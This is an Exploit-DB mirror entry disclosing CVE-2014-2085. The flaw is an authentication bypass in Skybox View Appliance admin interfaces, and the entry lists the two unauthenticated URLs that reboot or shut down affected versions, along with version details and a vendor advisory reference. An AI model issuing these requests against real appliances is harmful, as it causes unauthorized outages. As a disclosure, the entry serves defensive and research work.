exploit-db-mirror/exploits/hardware/dos/33328.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

42 lines
No EOL
1.5 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [SKYBOX Security - DDOS]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2085]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and execute reboot and/or shutdown of
appliance self
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to open and execute the reboot and shutdown script
without autentication at the following links:
https://1.1.1.1:444/scripts/commands/reboot?_=1111111111
https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso